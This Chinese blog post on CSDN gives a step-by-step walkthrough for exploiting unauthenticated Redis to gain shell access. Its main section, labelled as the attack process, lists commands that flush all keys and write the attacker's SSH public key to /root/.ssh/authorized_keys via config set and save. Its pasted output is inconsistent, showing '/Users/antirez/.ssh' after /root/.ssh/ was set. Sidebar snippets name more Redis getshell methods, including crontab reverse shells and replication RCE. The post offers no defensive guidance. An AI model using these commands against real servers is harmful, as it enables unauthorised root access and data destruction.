redis save漏洞getshell redis使用安全

最新推荐文章于 2022-03-01 15:13:28 发布
VIP文章 最新推荐文章于 2022-03-01 15:13:28 发布
阅读量659 收藏
点赞数
分类专栏: redis 系统安全 文章标签: redis 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014017080/article/details/77508574
版权

redis是现在很常用的cache工具,他的save功能也是冗灾数据持久化常用的命令,

但是如果使用不当的话也会带来致命的问题。


======下面是攻击过程==========

ssh-keygen -t rsa 生成秘钥 root/.ssh/下面的.pud

1. 事先先准备好自己的公钥,写入一个本地文件foo.txt。
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
2. 通过redis将该文件写入内存
$ redis-cli -h 192.168.1.11 flushall  //删除所有key
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
3. 利用redis-cli 写入配置的方式将公钥写入到.ssh目录下
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /root/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
4.然后就可以通过自己的私钥登陆服务器

.ssh700权限 authorized_keys 600

===

最低0.47元/天 解锁文章
__DEBUG__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
redis未授权访问getshell
Jiajiajiang_的博客
08-02 5474
参考:https://blog.csdn.net/guxiaoguo/article/details/78913245 利用条件:linux,对方开启ssh 用到的工具:kali nmap redis 公司测试服务器:10.0.3.45 redis默认端口:6379 主要思路:利用redis未授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器 ...
Redis系列漏洞总结
NLost
10-21 6018
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
redis渗透中的getshell问题总结
热门推荐
Exploit的小站~
05-10 2万+
 0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
Redis SAVE 命令 返回 ERR
weixin_30367945的博客
06-22 1744
今天使用redis-cli客户端中执行SAVE命令返回 (error) ERR Baidu找不到答案,去Google找一下 应该是redis-server服务没有root权限 然后sudo kill -9 pid把redis干了 重新用sudo权限启动就可以了 我用的是Mac Pro 转载于:https://www.cnblogs.com/xiaozong/p/5606496.html...
redis中需要的dll文件
01-06
程序中需要引用的dll文件,在程序中编写的类需要里面的属性。
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
快速搭建redisshell脚本
01-17
快速搭建redisshell脚本,包括单机,主备,原生集群,codis集群 使用环境为Linux,需要能编译redis源码 redis版本为5.0.3,codis版本为3.2.2
CentOS下redis自启动shell脚本
09-10
主要介绍了CentOS下redis自启动shell脚本,使用此脚本可以加入系统服务,实现redis机启动,并且包含了如启动、停止、重启等功能命令,需要的朋友可以参考下
redis安全配置基线.xlsx
最新发布
05-24
redis安全配置基线.xlsx
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
利用Redis未授权漏洞实现getshell
MD@@nr丫卡uer
01-12 529
(1)写ssh-keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 Redis服务使用ROOT账号启动 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 1:本地建立ssh的密钥 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa Enter passphrase
redis漏洞复现】Redis getshell的几种方式
一剑开天门!的博客
03-01 1万+
Redis getshell的几种方式
phpredis中文手册——《redis中文手册》 php版
weixin_34370347的博客
03-05 857
redis中文手册:http://readthedocs.org/docs/redis/en/latest/ 本文是参考《redis中文手册》,将示例代码用php来实现,注意php-redisredis_cli的区别(主要是返回值类型和参数用法)。 目录(使用CTRL+F快速查找命令): KeyStringHashListSet 键(Key)...
ssh不能进入save方法_快速理清为什么你的redis未授权不能getshell
weixin_39657444的博客
12-09 220
01未授权产生原因1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护。2.没有设置密码认证,可以免密远程登录redis服务02漏洞危害1.信息泄露,攻击者可以恶意执行flushall清空数据2.可以通过eval执行lua代码,或通过数据备份功能往磁盘写入后门文件3.若以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH...
Redis写操作错误((error) MISCONF Redis is configured to save RDB snapshots)
mojiewangday的博客
11-25 603
一:以下是相关命令及报错信息 大致信息为: Redis被配置为保存数据库快照,但它目前不能持久化到硬盘。用来修改集合数据的命令不能用。详细错误信息请查看Redis日志的。 报错信息提示很友好了,跟stop-writes-on-bgsave-error配置有关。 我们不着急查看配置,先根据提示进一步查看redis日志信息: 到这里发现日志全是报没权限的错误信息。 二...
redis 不能save问题解决
忘得快的专栏
12-13 5593
MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please check Redis logs for details about the error
尝试从redis未授权访问到getshell的四种姿势(失败)
风沙吹奏的博客
09-14 740
尝试从redis未授权访问到getshell的四种姿势(失败) 使用Goby扫描某SRC的C段,发现一个Redis未授权,经验证漏洞存在,故尝试Getshell提高危害(拿更多赏金) 虽然Getshell是失败了,但留个坑在这,以后看看失败的原因。 目录 crontab-计划任务 利用主从复制RCE 通过Web服务写入webshell 写ssh-keygen公钥然后使用私钥登录 1. crontab-计划任务 首先现在自己服务器上监听个端口,例如我这里的8998 nc -lvvp 8998 然后re

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

__DEBUG__

来杯可乐

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值